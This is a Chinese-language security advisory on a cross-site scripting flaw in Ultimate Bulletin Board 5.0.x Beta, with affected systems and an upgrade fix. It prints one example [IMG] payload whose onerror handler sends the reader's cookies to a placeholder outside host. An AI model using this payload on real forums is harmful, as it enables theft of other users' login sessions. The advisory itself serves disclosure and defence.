UBB漏洞

/ns/ld/softld/data/20010316011245.htm

涉及程序:
UBB
描述:
Ultimate 电子公告板[IMG]中标签嵌入恶意的Java脚本漏洞

详细:
Ultimate Bulletin Board(UBB)是由 Infopop 开发的一种基于 WWW 界面的免费电子公告板。UBB 使用 cookie 技术记录登录用户的敏感信息,如用户名、密码等等,并且 cookie 是保存在客户端的。

在 UBB 5.0.x Beta 中存在一个设计上的错误。由于没有对用户输入进行充分的检查,恶意用户可能在[img]标签中嵌入单行的 javascript 然后贴到讨论组上去,如果其他用户阅读、回复该条消息时,javascript 将被执行。这样,远程用户将可能获得其他用户的 cookie。

例如,在文章中嵌入下列代码:

[IMG]test"onerror="this.src='http://xxx.xxx.com/page.cfm?'+escape(document.cookie);
[/IMG]

则任何用户在回复此消息时将导致他们的cookie内容被转发给一个外部主机。

受影响的系统:
Infopop Ultimate Bulletin Board 5.0.x Beta
- Sun Solaris 8.0
- RedHat Linux 7.0
- OpenBSD OpenBSD 2.8
- HP HP-UX 11.11
- Debian Linux 2.2
- Caldera eServer 2.3
- BSDI BSD/OS 4.0.1

不受影响系统:
Infopop Ultimate Bulletin Board 6.0 Beta

解决方案:
升级到 Ultimate Bulletin Board 6.0 Beta,下载地址: http://www.infopop.com/nonbusiness/nonbusiness_ubb.html